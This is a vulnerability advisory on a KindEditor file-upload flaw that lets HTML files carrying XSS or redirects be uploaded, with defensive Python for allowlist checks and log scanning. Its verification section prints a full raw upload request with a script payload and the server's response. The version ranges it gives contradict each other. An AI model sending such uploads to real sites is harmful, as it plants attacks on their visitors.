KindEditor file upload vulnerability
Vulnerability description
The vulnerability is in the KindEditor editor: .txt and .html files can be uploaded through it. The editor ships server-side upload handlers for php/asp/jsp/asp.net, and the vulnerability is present in KindEditor versions <= 4.1.5.
An uploaded HTML file can carry hidden links (dark links) as well as XSS. KindEditor's uploadbutton.html is the file-upload page; it POSTs directly to /upload_json.*?dir=file, and the list of allowed upload extensions includes htm and txt: extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2")
Because KindEditor's upload_json.* upload handler can be called directly, htm/html files can be uploaded to the server, and a user can upload a page containing code that redirects visitors to a malicious site.
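The following Python is an added example, not code from this write-up or from KindEditor itself. It models the extension check described above: the vulnerable extTable entry for dir=file beside a hardened table that drops the active-content extensions, a stricter filename check, and a small scan over constructed access-log lines that flags POSTs to upload_json.* with dir=file so an operator can spot the upload path being exercised. The way the original check splits the extension (text after the last dot, lower-cased), the hardened table, the function names and the log lines are assumptions/constructed sample data.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs

# Extension table as described in the write-up (dir "file" only).
VULNERABLE_EXT_TABLE = {
    "file": "doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2",
}

# Hardened table (our assumption, not KindEditor's shipped config): browser-
# rendered active content (htm/html) is removed from the upload allowlist.
HARDENED_EXT_TABLE = {
    "file": "doc,docx,xls,xlsx,ppt,txt,zip,rar,gz,bz2",
}

# Extensions a browser renders as active content; they must never land in an
# upload directory that the web server serves back as static files.
ACTIVE_CONTENT_EXTS = {"htm", "html", "xhtml", "shtml", "svg"}


def is_allowed(filename: str, dir_name: str, ext_table: dict) -> bool:
    """Modelled on the KindEditor-style check (assumption): the text after the
    last dot, lower-cased, must be in the comma-separated list for dir_name."""
    allowed = set(ext_table.get(dir_name, "").split(","))
    _, ext = posixpath.splitext(filename)
    return ext.lstrip(".").lower() in allowed


def is_allowed_hardened(filename: str, dir_name: str,
                        ext_table: dict = HARDENED_EXT_TABLE) -> bool:
    """Stricter check: reject path characters and NULs, require a real
    extension, and deny active-content extensions anywhere in the name (some
    servers honour inner extensions such as a.html.zip)."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False
    allowed = set(ext_table.get(dir_name, "").split(","))
    if parts[-1] not in allowed:
        return False
    return not any(p in ACTIVE_CONTENT_EXTS for p in parts[1:])


# Constructed access-log lines (combined log format); the URL and date values
# mirror the request/response shown in the write-up, client IPs are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Sep/2021:15:33:15 +0800] "POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1" 200 94',
    '10.0.0.5 - - [09/Sep/2021:15:33:16 +0800] "GET /kindeditor/attached/file/20210909/20210909153396539653.html HTTP/1.1" 200 27',
    '10.0.0.6 - - [09/Sep/2021:15:34:00 +0800] "POST /kindeditor/php/upload_json.php?dir=image HTTP/1.1" 200 120',
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
UPLOAD_HANDLER_RE = re.compile(r"/upload_json\.(asp|aspx|php|jsp)$", re.IGNORECASE)


def flag_upload_requests(log_lines):
    """Return (path, status) for every POST to upload_json.* with dir=file."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or m.group("method") != "POST":
            continue
        url = urlsplit(m.group("path"))
        if not UPLOAD_HANDLER_RE.search(url.path):
            continue
        if parse_qs(url.query).get("dir", [""])[0] == "file":
            hits.append((url.path, m.group("status")))
    return hits


if __name__ == "__main__":
    for name in ("1.html", "report.docx", "a.html.zip"):
        print(name,
              "vulnerable:", is_allowed(name, "file", VULNERABLE_EXT_TABLE),
              "hardened:", is_allowed_hardened(name, "file"))
    print("flagged:", flag_upload_requests(SAMPLE_LOG))
```

The allowlist change alone is not a complete fix: uploads should also be stored outside the web root or served with a download disposition and nosniff header, and the unauthenticated upload_json.* entry point itself should be removed or put behind authentication, as the remediation section below recommends.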
Affected versions
KindEditor versions < 4.1.12
Vulnerability verification
The vulnerability exists in KindEditor <= 4.1.12, so first check the editor version.
1. Check the version information
2. Verify the vulnerability
Request
POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216
Content-Length: 260
Connection: close
Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

-----------------------------283422705626536477632563104216
Content-Disposition: form-data; name="imgFile"; filename="1.html"
Content-Type: application/octet-stream

<script>alert('1')</script>
-----------------------------283422705626536477632563104216--
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/
X-Powered-By: ASP.NET
Date: Thu, 09 Sep 2021 07:33:15 GMT
Connection: close
Content-Length: 94

{"error":0,"url":"\/kindeditor\/asp\/..\/attached\/file\/20210909\/20210909153396539653.html"}
Remediation
1. Delete the upload_json.* and file_manager_json.* handler files outright
2. Upgrade KindEditor to the latest version
References
https://www.anquanke.com/post/id/171422
https://www.cnblogs.com/backlion/p/10421405.html